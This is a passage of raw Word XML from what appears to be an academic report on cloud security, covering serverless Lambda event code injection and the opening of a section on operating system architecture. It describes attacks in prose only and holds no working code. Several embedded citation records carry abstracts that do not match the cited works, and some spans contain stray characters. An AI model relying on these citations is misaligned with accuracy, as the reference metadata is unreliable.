      <w:r w:rsidR="00801096">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0090297E">
        <w:t xml:space="preserve"> method </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to force malicious code through the API </w:t>
      </w:r>
      <w:r w:rsidR="0090297E">
        <w:t>to generate insecure malicious lambda function calls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This </w:t>
      </w:r>
      <w:r w:rsidR="00060ABD">
        <w:t>technique</w:t>
      </w:r>
      <w:r w:rsidR="0090297E">
        <w:t xml:space="preserve"> allowed the researchers to write to the backend </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">database; </w:t>
      </w:r>
      <w:r w:rsidR="0090297E">
        <w:t xml:space="preserve">DynamoDB </w:t>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="003C50CE">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1145/1323293.1294281","ISBN":"9781595935915","ISSN":"01635980","PMID":"18197987","abstract":"joints à l'article : comptes rendus d'ouvrage consacrés à Aristophane (RPh, 38, 1964, p. 128-131)","author":[{"dropping-particle":"","family":"Amazon","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Sosp","id":"ITEM-1","issued":{"date-parts":[["2007"]]},"title":"Amazon Dynamo DB","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=66461013-b114-432d-8ff5-41bc79e8362a"]}],"mendeley":{"formattedCitation":"[15]","plainTextFormattedCitation":"[15]","previouslyFormattedCitation":"[15]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00060ABD" w:rsidRPr="00060ABD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[15]</w:t>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0090297E">
        <w:t xml:space="preserve">and garner a reply from the slack API backend process that then permitted full access to a CSP clients website cloud environment and the secure files stored within the </w:t>
      </w:r>
      <w:r w:rsidR="00060ABD">
        <w:t xml:space="preserve">CSP underlying network infrastructures </w:t>
      </w:r>
      <w:r w:rsidR="0090297E">
        <w:t>Virtual Machine</w:t>
      </w:r>
      <w:r w:rsidR="00060ABD">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0090297E">
        <w:t xml:space="preserve"> (VM)</w:t>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="003C50CE">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1007/978-1-84628-246-1","ISBN":"1852339691","abstract":"Virtual Machine technology applies the concept of virtualization to an entire machine, circumventing real machine compatibility constraints and hardware resource constraints to enable a higher degree of software portability and flexibility. Virtual machines are rapidly becoming an essential element in computer system design. They provide system security, flexibility, cross-platform compatibility, reliability, and resource efficiency. Designed to solve problems in combining and using major computer system components, virtual machine technologies play a key role in many disciplines, including operating systems, programming languages, and computer architecture. For example, at the process level, virtualizing technologies support dynamic program translation and platform-independent network computing. At the system level, they support multiple operating system environments on the same hardware platform and in servers. Historically, individual virtual machine techniques have been developed within the specific disciplines that employ them (in some cases they aren't even referred to as \"virtual machines\"), making it difficult to see their common underlying relationships in a cohesive way. In this text, Smith and Nair take a new approach by examining virtual machines as a unified discipline. Pulling together cross-cutting technologies allows virtual machine implementations to be studied and engineered in a well-structured manner. Topics include instruction set emulation, dynamic program translation and optimization, high level virtual machines (including Java and CLI), and system virtual machines for both single-user systems and servers. * Examines virtual machine technologies across the disciplines that use them-operating systems, programming languages and computer architecture-defining a new and unified discipline. * Reviewed by principle researchers at Microsoft, HP, and by other industry research groups. * Written by two authors who combine several decades of expertise in computer system research and development, both in academia and industry.. © 2005 Elsevier Inc. All rights reserved.","author":[{"dropping-particle":"","family":"Craig","given":"Iain D.","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Virtual Machines","id":"ITEM-1","issued":{"date-parts":[["2006"]]},"title":"Virtual machines","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=e22a36a8-82c8-4ef8-a6b6-6b2c136b1efa"]}],"mendeley":{"formattedCitation":"[18]","plainTextFormattedCitation":"[18]","previouslyFormattedCitation":"[18]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00060ABD" w:rsidRPr="00060ABD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[18]</w:t>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0090297E">
        <w:t xml:space="preserve"> being utilised at the CSP to host </w:t>
      </w:r>
      <w:r w:rsidR="00060ABD">
        <w:t xml:space="preserve">a thousands of </w:t>
      </w:r>
      <w:r w:rsidR="0090297E">
        <w:t>client websites.</w:t>
      </w:r>
      <w:r w:rsidR="003C50CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C50CE">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00E06FE7">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://docs.aws.amazon.com/lambda/latest/dg/best-practices.html","accessed":{"date-parts":[["2020","5","11"]]},"author":[{"dropping-particle":"","family":"AWS","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"docs.aws.amazon.com","id":"ITEM-1","issued":{"date-parts":[["2020"]]},"page":"1-1","title":"Best Practices for Working with AWS Lambda Functions - AWS Lambda","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=04702997-b803-38d0-8c05-6e17104a788e"]}],"mendeley":{"formattedCitation":"[16]","plainTextFormattedCitation":"[16]","previouslyFormattedCitation":"[16]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="003C50CE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003C50CE" w:rsidRPr="003C50CE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[16]</w:t>
      </w:r>
      <w:r w:rsidR="003C50CE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4117" w14:textId="130956A3" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Researchers reported that the most efficient way to exploit this vulnerability is by injecting the malicious ‘NodeJS’ </w:t>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="003C50CE">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.23919/MIPRO.2018.8400088","ISBN":"9789532330977","abstract":"JavaScript-based agent middleware frameworks are rare and the security handling of these is uncommon, since JavaScript does not have built-in security mechanisms and due to the lack of external security libraries. This paper gives possible solutions for including security in the SiebogJS, an agent middleware developed using NodeJS and thus implemented in JavaScript. It gives the end user the ability to upload agent files and execute them on the server. However, such actions can cause security problems. In order to prevent security issues, two security mechanisms were implemented and integrated into the SiebogJS: the ESLint library for the static code analysis and the Nodesentry library for securing external libraries that are required by an agent. The ESLint library is used to detect problematic code and the Nodesentry library is used for preventing an agent to execute malicious code during the runtime. In this way, malicious code execution can be prevented within an agent, both before and during the execution. This approach represents a good starting point for implementing security standards for the SiebogJS agent middleware, and therefore it is planned to use these security measures as standard security representation in SiebogJS.","author":[{"dropping-particle":"","family":"Aleksic","given":"Aleksandra","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ivanovic","given":"Mirjana","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Holbl","given":"Marko","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Welzer","given":"Tatjana","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Vidakovic","given":"Milan","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"2018 41st International Convention on Information and Communication Technology, Electronics and Microelectronics, MIPRO 2018 - Proceedings","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"title":"Adding security to the JavaScript-based agent middleware SiebogJS","type":"paper-conference"},"uris":["http://www.mendeley.com/documents/?uuid=b812bc62-de43-4ffd-96ac-f6fedbccb9b8"]}],"mendeley":{"formattedCitation":"[19]","plainTextFormattedCitation":"[19]","previouslyFormattedCitation":"[19]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00060ABD" w:rsidRPr="00060ABD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[19]</w:t>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00060ABD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>lambda function event call code within an automated chat bot</w:t>
      </w:r>
      <w:r w:rsidR="00E06FE7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E06FE7">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1007/978-1-4842-3111-1","abstract":"Includes index. Learn best practices for building bots by focusing on the technological implementation and UX in this practical book. You will cover key topics such as setting up a development environment for creating chatbots for multiple channels (Facebook Messenger, Skype, and KiK); building a chatbot (design to implementation); integrating to IFTT (If This Then That) and IoT (Internet of Things); carrying out analytics and metrics for chatbots; and most importantly monetizing models and business sense for chatbots. Build Better Chatbots is easy to follow with code snippets provided in the book and complete code open sourced and available to download. With Facebook opening up its Messenger platform for developers, followed by Microsoft opening up Skype for development, a new channel has emerged for brands to acquire, engage, and service customers on chat with chatbots. You will: Work with the bot development life cycle Master bot UX design Integrate into the bot ecosystem Maximize the business and monetization potential for bots. Learn best practices for building bots by focusing on the technological implementation and UX in this practical book. You will cover key topics such as setting up a development environment for creating chatbots for multiple channels (Facebook Messenger, Skype, and KiK); building a chatbot (design to implementation); integrating to IFTT (If This Then That) and IoT (Internet of Things); carrying out analytics and metrics for chatbots; and most importantly monetizing models and business sense for chatbots.µild Better Chatbots</w:instrText>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cs="Microsoft JhengHei" w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>鳠</w:instrText>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:instrText xml:space="preserve">easy to follow with code snippets provided in the book and complete code open sourced and available to download.שth Facebook opening up its Messenger platform for developers, followed by Microsoft opening up Skype for development, a new channel has emerged for brands to acquire, engage, and service customers on chat with chatbots. You will: Work with the bot development life cycle Master bot UX design Integrate into the bot ecosystem Maximize the business and monetization potential for bots. Chapter 1: Introduction to Chatbot -- Chapter 2: Setting up the Developer Environment -- Chapter 3: Basics of Bot Building -- Chapter 4: Integrations to IFTT &amp; IoT -- Chapter 5: Business &amp; Monetization. Chapter 1: </w:instrText>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>鮴</w:instrText>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:instrText xml:space="preserve">troduction to Chatbot -- Chapter 2: </w:instrText>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>㥴</w:instrText>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:instrText>ting up the Developer Environment -- Chapter 3: Basics of Bot Building -- Chapter 4: Integrations to IFTT &amp; IoT -- Chapter 5: Business &amp; Monetization.","author":[{"dropping-particle":"","family":"Khan","given":"Rashid","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Das","given":"Anik","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Build Better Chatbots","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"title":"Build Better Chatbots","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=3e1dfa3f-594b-4ca2-87a7-080fe6ebc024"]}],"mendeley":{"formattedCitation":"[20]","plainTextFormattedCitation":"[20]","previouslyFormattedCitation":"[20]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00E06FE7">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E06FE7" w:rsidRPr="00E06FE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[20]</w:t>
      </w:r>
      <w:r w:rsidR="00E06FE7">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to access the backend database or </w:t>
      </w:r>
      <w:r w:rsidRPr="00801096">
        <w:t>alternatively utilising website search engine bars to inject code, although this method does not have a high success rate with this method of forced code injection.</w:t>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://www.protego.io/owasp-top-ten-serverless-attacks-sls-1-event-injection/","accessed":{"date-parts":[["2020","5","11"]]},"author":[{"dropping-particle":"","family":"Protege Cloud Security","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Protego.io","id":"ITEM-1","issued":{"date-parts":[["2020"]]},"page":"1-1","title":"OWASP - Code Event Injection","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=7957d4a1-e319-3925-830a-028729a5b185"]},{"id":"ITEM-2","itemData":{"URL":"https://docs.aws.amazon.com/lambda/latest/dg/best-practices.html","accessed":{"date-parts":[["2020","5","11"]]},"author":[{"dropping-particle":"","family":"AWS","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"docs.aws.amazon.com","id":"ITEM-2","issued":{"date-parts":[["2020"]]},"page":"1-1","title":"Best Practices for Working with AWS Lambda Functions - AWS Lambda","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=04702997-b803-38d0-8c05-6e17104a788e"]}],"mendeley":{"formattedCitation":"[16], [21]","plainTextFormattedCitation":"[16], [21]","previouslyFormattedCitation":"[16], [21]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E06FE7" w:rsidRPr="00E06FE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[16], [21]</w:t>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00DE262D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE262D">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1002/kin.550040606","ISSN":"10974601","abstract":"The first release candidate received a great deal of push back, which caused a leadership change, involving the community in re-evaluating what the OWASP Top 10 is, the methodology, the data collection and analysis, and how we provide transparency and governance over the project. Most of all, the push back showed us how much passion the community has for the OWASP Top 10, and thus how critical it is for OWASP to get the Top 10 right for the majority of use cases. We have worked extensively to validate the methodology, obtained a great deal of data on over 114,000 apps, and obtained qualitative data via survey by 550 community members on the two new categories – insecure deserialization and insufficient logging and monitoring. We strongly urge for any corrections or issues to be logged at GitHub • https://github.com/OWASP/Top10/issues Through public transparency, we provide traceability and ensure that all voices are heard during this final month before publication. The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications and APIs that can be trusted. At OWASP you'll find free and open • Application security tools and standards • Complete books on application security testing, secure code development, and secure code review • Presentations and videos • Cheat sheets on many common topics • Standard security controls and libraries • Local chapters worldwide • Cutting edge research • Extensive conferences worldwide • Mailing lists Learn more at: https://www.owasp.org. All of the OWASP tools, documents, videos, presentations, and chapters are free and open to anyone interested in improving application security. We advocate approaching application security as a people, process, and technology problem, because the most effective approaches to application security require improvements in these areas. OWASP is a new kind of organization. Our freedom from commercial pressures allows us to provide unbiased, practical, cost-effective information about application security. OWASP is not affiliated with any technology company, although we support the informed use of commercial security technology. OWASP produces many types of materials in a collaborative, transparent and open way. The OWASP Foundation is the non-profit entity that ensures the project's long-term success. Almost everyone associated with OWASP is a volunteer, including the OWASP Board, Chapter Leaders, Pro…","author":[{"dropping-particle":"","family":"Owasp.org","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Https://Owasp.Org","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"title":"OWASP top 10 - 2017","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=715b5939-3db4-4602-bd10-7cc7d84b6c08"]}],"mendeley":{"formattedCitation":"[22]","plainTextFormattedCitation":"[22]","previouslyFormattedCitation":"[22]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00DE262D">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E06FE7" w:rsidRPr="00E06FE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[22]</w:t>
      </w:r>
      <w:r w:rsidR="00DE262D">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4118" w14:textId="0FD71BCB" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Although there are many security vulnerabilities within cloud computing, the API lambda function event code injection is one of the most popular vulnerabilities that is exploited by malicious actors around the globe, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE262D">
        <w:t>according</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to Open Web Application Security Project (OWASP)</w:t>
      </w:r>
      <w:r w:rsidR="00DE262D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE262D">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"Environmental risk assessment and decision-making strategies over the last several decades have become increasingly more sophisticated, information-intensive, and complex, including such approaches as expert judgment, cost-benefit analysis, and toxicological risk assessment. One tool that has been used to support environmental decision-making is comparative risk assessment (CRA), but CRA lacks a structured method for arriving at an optimal project alternative. Multi-criteria decision analysis (MCDA) provides better-supported techniques for the comparison of project alternatives based on decision matrices, and it also provides structured methods for the incorporation of project stakeholders' opinions in the ranking of alternatives. We argue that the inherent uncertainty in our ability to predict ecosystem evolution and response to different management policies requires shifting from optimization-based management to an adaptive management paradigm. This paper brings together a multidisciplinary review of existing decision-making approaches at regulatory agencies in the United States and Europe and synthesizes state-of-the-art research in CRA, MCDA, and adaptive management methods applicable to environmental remediation and restoration projects. We propose a basic decision analytic framework that couples MCDA with adaptive management and its public participation and stakeholder value elicitation methods, and we demonstrate application of the framework to a realistic case study based on contaminated sediment management issues in the New York/New Jersey Harbor. ?? 2006 Elsevier Ltd. All rights reserved.","author":[{"dropping-particle":"","family":"OWASP","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"OWASP.ORG","id":"ITEM-1","issued":{"date-parts":[["2015"]]},"title":"OWASP","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=f411413a-cfd4-49a8-91b9-c0579982e97c"]}],"mendeley":{"formattedCitation":"[23]","plainTextFormattedCitation":"[23]","previouslyFormattedCitation":"[23]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00DE262D">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E06FE7" w:rsidRPr="00E06FE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[23]</w:t>
      </w:r>
      <w:r w:rsidR="00DE262D">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that are one of the  leading network/software security organisations in the world</w:t>
      </w:r>
      <w:r w:rsidR="00060ABD">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> whom are highly respected for their reliable research within the network security community.</w:t>
      </w:r>
      <w:r w:rsidR="00DE262D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE262D">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1002/kin.550040606","ISSN":"10974601","abstract":"The first release candidate received a great deal of push back, which caused a leadership change, involving the community in re-evaluating what the OWASP Top 10 is, the methodology, the data collection and analysis, and how we provide transparency and governance over the project. Most of all, the push back showed us how much passion the community has for the OWASP Top 10, and thus how critical it is for OWASP to get the Top 10 right for the majority of use cases. We have worked extensively to validate the methodology, obtained a great deal of data on over 114,000 apps, and obtained qualitative data via survey by 550 community members on the two new categories – insecure deserialization and insufficient logging and monitoring. We strongly urge for any corrections or issues to be logged at GitHub • https://github.com/OWASP/Top10/issues Through public transparency, we provide traceability and ensure that all voices are heard during this final month before publication. The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications and APIs that can be trusted. At OWASP you'll find free and open • Application security tools and standards • Complete books on application security testing, secure code development, and secure code review • Presentations and videos • Cheat sheets on many common topics • Standard security controls and libraries • Local chapters worldwide • Cutting edge research • Extensive conferences worldwide • Mailing lists Learn more at: https://www.owasp.org. All of the OWASP tools, documents, videos, presentations, and chapters are free and open to anyone interested in improving application security. We advocate approaching application security as a people, process, and technology problem, because the most effective approaches to application security require improvements in these areas. OWASP is a new kind of organization. Our freedom from commercial pressures allows us to provide unbiased, practical, cost-effective information about application security. OWASP is not affiliated with any technology company, although we support the informed use of commercial security technology. OWASP produces many types of materials in a collaborative, transparent and open way. The OWASP Foundation is the non-profit entity that ensures the project's long-term success. Almost everyone associated with OWASP is a volunteer, including the OWASP Board, Chapter Leaders, Pro…","author":[{"dropping-particle":"","family":"Owasp.org","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Https://Owasp.Org","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"title":"OWASP top 10 - 2017","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=715b5939-3db4-4602-bd10-7cc7d84b6c08"]}],"mendeley":{"formattedCitation":"[22]","plainTextFormattedCitation":"[22]","previouslyFormattedCitation":"[22]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00DE262D">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E06FE7" w:rsidRPr="00E06FE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[22]</w:t>
      </w:r>
      <w:r w:rsidR="00DE262D">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4119" w14:textId="09165C9C" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc40134033"/>
      <w:r>
        <w:t xml:space="preserve">2.2 Operating System Architectures and </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC73A9">
        <w:t>Protocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="43277FC1" w14:textId="37501AB8" w:rsidR="007F139F" w:rsidRDefault="007F139F" w:rsidP="0053567D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Understanding an Operating System</w:t>
      </w:r>
      <w:r w:rsidR="004047D7">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (OS) </w:t>
      </w:r>
      <w:r w:rsidR="0053567D">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1016/B978-012170960-0/50030-X","ISBN":"9780121709600","abstract":"This chapter discusses operating systems. The operating system of a computer is software, which controls all the computer's resources and provides the base upon which the application programs can be written. Modern operating systems also provide numerous services, such as inter-process communication, file and directory systems, data transfer over networks, and a command language for invoking and controlling programs. The operating system puts a layer of software on top of the bare hardware, manages all parts of the system, and presents the user with an interface or virtual machine that is easier to understand and program. An operating system thus can be defined as a set of software extensions of primitive hardware, culminating in a virtual machine that serves as a high-level programming environment and manages the flow of work in a network of computers. The virtual machine visible to the user is only the outermost of a series of software layers refining the base hardware. The principle behind the layered architecture is called information hiding-confining the details of managing a class of \"objects\" in a module that has a friendly interface with its users. © 2005 Copyright © 2005 Elsevier Inc. All rights reserved.","author":[{"dropping-particle":"","family":"Lien","given":"Yao Nan","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"The Electrical Engineering Handbook","id":"ITEM-1","issued":{"date-parts":[["2005"]]},"title":"Operating systems","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=94aedc37-94cd-453e-a2ad-d7866cad2e38"]}],"mendeley":{"formattedCitation":"[24]","plainTextFormattedCitation":"[24]","previouslyFormattedCitation":"[24]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="0053567D">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E06FE7" w:rsidRPr="00E06FE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[24]</w:t>
      </w:r>
      <w:r w:rsidR="0053567D">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C27055">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">architecture is paramount for cybersecurity professionals </w:t>
      </w:r>
      <w:r w:rsidR="004047D7">
        <w:t xml:space="preserve">whom seek </w:t>
      </w:r>
      <w:r w:rsidR="005767A1">
        <w:t>to leverage</w:t>
      </w:r>
      <w:r w:rsidR="004047D7">
        <w:t xml:space="preserve"> known and/or unknown vulnerabilities within the design of </w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t>an</w:t>
      </w:r>
      <w:r w:rsidR="004047D7">
        <w:t xml:space="preserve"> OS and the computer code that makes the OS function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C411B" w14:textId="20168B39" w:rsidR="00C5650F" w:rsidRDefault="0090297E" w:rsidP="0053567D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An Operating System (OS) design can be broken down into three main architectural components </w:t>
      </w:r>
      <w:r w:rsidR="00E06FE7">
        <w:t xml:space="preserve">illustrated </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="008F6FEF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>figure</w:t>
      </w:r>
      <w:r w:rsidR="009317BF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E06FE7">
        <w:rPr>
          <w:i/>
